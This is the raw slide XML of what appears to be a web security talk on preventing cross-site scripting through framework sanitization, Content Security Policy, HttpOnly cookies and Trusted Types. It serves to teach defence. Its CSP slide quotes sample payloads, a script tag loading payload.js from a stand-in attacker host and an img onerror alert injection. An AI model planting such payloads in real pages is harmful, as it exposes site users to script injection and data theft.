        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6051106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199A4-DBBE-4FC8-8191-A56EFC0E2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754F1F-6F67-4002-884D-423F226F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30798"/>
            <a:ext cx="6090648" cy="168388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DBAAFDF-7358-41AE-872D-6BA75EACB02A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547488" y="1986125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Angular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7E358CD-E5C9-4776-B994-1F375DE65E2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547488" y="4214683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https://angular.io/guide/security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804EC5-9538-4194-87B4-D159A64CD2FE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627649" y="2743227"/>
            <a:ext cx="2802487" cy="572026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BE12CAE-774C-4EE6-B459-16CC21E6A446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8430136" y="2558561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encoded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7E79D1-A652-4E15-B872-0F9691D5050B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497141" y="3913948"/>
            <a:ext cx="4221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interprets HTML but not JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(sanitized)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C584904-79F0-4569-ACEC-8B7EFD46100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935824" y="3995454"/>
            <a:ext cx="1561317" cy="241660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6AF5932F-82A1-4BD6-89FD-6048480F8273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547488" y="4974308"/>
            <a:ext cx="10690555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 careful with exceptions like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sanitizer.bypassSecurityTrustHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and similar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Avoid escape hatches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="28575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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nativeElement.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="28575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.renderer2.setProperty(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>this.div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>this.inputValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/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26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568D7-1884-4D23-9D4B-D2BB8A0C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1FEE8C9A-466B-0328-9FDF-C28067FE0E61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459060" y="2100683"/>
            <a:ext cx="10515600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React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default output encoded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for URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>manual escaping/sanitizing necessary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automatic sanitizer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>combination with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>try to centralize the code!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Avoid escape hatches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ReactDOM.findDOMNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(this).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>React.createRef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();  =&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ref.current.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += 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92DD98-F1C6-E24D-A321-A1994DFC7A06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7018052" y="3446628"/>
            <a:ext cx="51739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ADDEE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://dev.to/spukas/preventing-xss-in-react-applications-5f5j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55B7396-974D-3727-7C4A-0D4871FBF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284" y="1690688"/>
            <a:ext cx="4287723" cy="174814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B0E9D9B-2113-E9E6-8B43-05CDA7161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236" y="3896543"/>
            <a:ext cx="3854012" cy="111646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78B9861-C7AB-ACF2-DD8E-9D70BDFE9C34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7018052" y="5013008"/>
            <a:ext cx="3992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rgbClr val="DADDEE"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://reactjs.org/blog/2019/08/08/react-v16.9.0.html#deprecating-javascript-urls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261096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5E2D7-99B3-4D9C-98CD-216F1C58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D3317A-6E90-4478-8908-28106AFE985A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="416244" y="2338469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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>template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80FE88-4B62-4D15-958C-44198343B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983" y="1690688"/>
            <a:ext cx="5954078" cy="45710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71F1BB-67AE-4C21-BF70-417619960348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="63837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https://golang.org/pkg/html/template/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28267703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89D6D-7140-41F2-9411-F3B7AD01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 Security Policy (CSP)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15DC11-1567-4C09-A8AA-3CA5BBAC0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02340" cy="4857115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/>
              <a:t>Restricts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load</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p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'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>origin</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/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script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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>='messageparser.js'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>neither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different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&lt;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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>='http://darkside.me/payload.js'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Nor inline code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>="x" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>="alert(1)"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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trusted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de-DE" dirty="0"/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' *.trustedpartner.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>reporting</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Reporting-Endpoints: endp-1="https://lightside.me/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cspreport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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‘; report-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endp-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy-Report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘; report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> endp-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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256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F6EC3-8D33-457B-9D19-B33A0C69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(CSP)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80017C-65A0-44F9-AC81-9872FD203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 specify one specific script as a trusted script loader instead of defining an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>allowlist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this script is identified by a random (changing) nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr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Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script-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 'nonce-r@nd0m' 'strict-dynamic';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ault-src 'self’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&lt;script 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="/script-loader.js" nonce="r@nd0m"&gt;&lt;/script&gt;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C90AF7-4C08-4DCF-B108-0D2503F28380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872740" y="6308209"/>
            <a:ext cx="832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https://content-security-policy.com/strict-dynamic/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98674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C0A08-242C-4D9C-AD22-02DD4737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Flag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EA4607-FE9F-487B-A05E-5E3CDEAA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53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AT" dirty="0"/>
              <a:t>Set Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>“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prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>especially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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Defense in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>: also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>disable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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> „TRACE“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>theory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> send a TRACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>request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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> via XSS (XST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Cookie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appended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request</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>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contain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>whole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>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able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read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>cookie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response</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> block TRACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>currently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 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known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>exploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>vector</a:t>
            </a:r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7322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81540-2868-077C-09A7-21A342C7E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4452" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted Types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6846A4-83A2-C79F-C860-F9D4A253A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Browser doesn’t accept</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>untrusted inputs at </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>dangerous sinks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Activated via CSP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18460C9-9561-5CB7-709E-4CB047230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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442069" y="994116"/>
            <a:ext cx="6420583" cy="217390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362A3D9-EF03-3A32-9CCF-D5EBC5B4D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471" y="3527542"/>
            <a:ext cx="7588423" cy="265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1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124873D-BEED-4BA4-AE73-4AA7215AF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175" y="2121119"/>
            <a:ext cx="7592786" cy="187281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859CAE7-9E0F-4E64-B450-382C84E6314D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144921" y="4532654"/>
            <a:ext cx="5739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436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20F147-7431-690B-B896-2464123D0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22643" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted Types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63A443-49C6-561D-29C1-304370CD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05" y="1653859"/>
            <a:ext cx="11305403" cy="46544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Manually mark as trusted type with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DOMPurify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Or set a Trusted Type Policy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Can also be used in Angular, React etc.</a:t>
            </a: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5CF382-162A-1FFA-AE15-6C9787B6B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053" y="2118919"/>
            <a:ext cx="8807903" cy="4064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343AACD-80BD-A943-25A3-CE05E2997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5" y="3671354"/>
            <a:ext cx="5104108" cy="16843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9BFCAD6-7265-371B-8C5E-5D0D6573B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368" y="3671354"/>
            <a:ext cx="5936327" cy="168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7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6F270-9E26-0076-31B5-3C6DDE8F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Trusted Types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1F4A02-F9CE-F994-4FC5-325B9E64A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Currently only supported in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>chromium engine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Either use it for development only or check out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>polyfills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https://github.com/w3c/trusted-types#polyfill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Nice writeup about trusted types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://auth0.com/blog/securing-spa-with-trusted-types/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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48F8A0-04FB-FCB9-BB18-8D4E1A459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128" y="1566001"/>
            <a:ext cx="4226592" cy="202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8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6682985"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
